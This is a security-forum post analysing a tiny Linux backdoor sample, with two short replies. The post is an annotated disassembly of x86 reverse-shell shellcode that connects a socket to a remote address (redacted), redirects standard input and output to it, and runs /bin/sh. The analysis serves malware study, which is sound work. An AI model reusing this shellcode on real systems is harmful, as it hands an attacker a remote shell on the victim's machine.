[原创]一个短小的 Linux 后门样本分析-软件逆向-看雪-安全社区|安全招聘|kanxue.com

[原创]一个短小的 Linux 后门样本分析

2014-10-13 18:26 3926

[原创]一个短小的 Linux 后门样本分析

zrhai

2014-10-13 18:26

3926

LOAD:08048054                public start
LOAD:08048054 start:
LOAD:08048054                xor    ebx, ebx
LOAD:08048056                mul    ebx
LOAD:08048058                push ebx
LOAD:08048059                inc    ebx          ; SOCKOP_socket
LOAD:0804805A create a new socket
LOAD:0804805A                push ebx
LOAD:0804805B                push 2
LOAD:0804805D                mov    ecx, esp
LOAD:0804805F                mov    al, SYS_socketcall ; sys_socketcall
LOAD:08048061                int    80h          ; LINUX -
LOAD:08048063 redirect stdin(0)、stdout(1)、stderr(2) to new socket
LOAD:08048063                xchg eax, ebx
LOAD:08048064                pop    ecx
LOAD:08048065 loc_8048065:                         ; CODE XREF: LOAD:0804806Aj
LOAD:08048065                mov    al, SYS_dup2       ; sys_dup2
LOAD:08048067                int    80h          ; LINUX -
LOAD:08048069                dec    ecx
LOAD:0804806A                jns    short loc_8048065 ; sys_dup2
LOAD:0804806C sock_connect(int fd, struct sockaddr *uservaddr, int addrlen)
LOAD:0804806C                push xxxxxxxxh    ; struct sockaddr<sin_family, sin_port, sin_addr>
LOAD:08048071                push xxxxxxxxh
LOAD:08048076                mov    ecx, esp
LOAD:08048078                mov    al, SYS_socketcall
LOAD:0804807A                push eax
LOAD:0804807B                push ecx
LOAD:0804807C                push ebx          ; fd
LOAD:0804807D                mov    bl, 3
LOAD:0804807F                mov    ecx, esp
LOAD:08048081                int    80h          ; LINUX -
LOAD:08048083 execute /bin/sh
LOAD:08048083                push edx
LOAD:08048084                push 'hs//'
LOAD:08048089                push 'nib/'       ; /bin/sh
LOAD:0804808E                mov    ebx, esp
LOAD:08048090                push edx
LOAD:08048091                push ebx
LOAD:08048092                mov    ecx, esp
LOAD:08048094                mov    al, 0Bh       ; sys_execve
LOAD:08048096                int    80h          ; LINUX -

[培训]《安卓高级研修班(网课)》月薪三万计划，掌握调试、分析还原ollvm、vmp的方法，定制art虚拟机自动化脱壳的方法

收藏・3

点赞・0

打赏

最新回复 (2)
ycmint 雪币： 1149 活跃值： (783) 能力值： ( LV13，RANK：260 ) 在线值：发帖 28 回帖 902 粉丝 10 关注私信	ycmint 5 2014-10-13 18:55 2 楼 0 处理好变量就是payload的基本模式了.....
lylqiang 雪币： 59 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 78 粉丝 0 关注私信	lylqiang 2014-10-13 20:44 3 楼 0 一看代码就头大
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复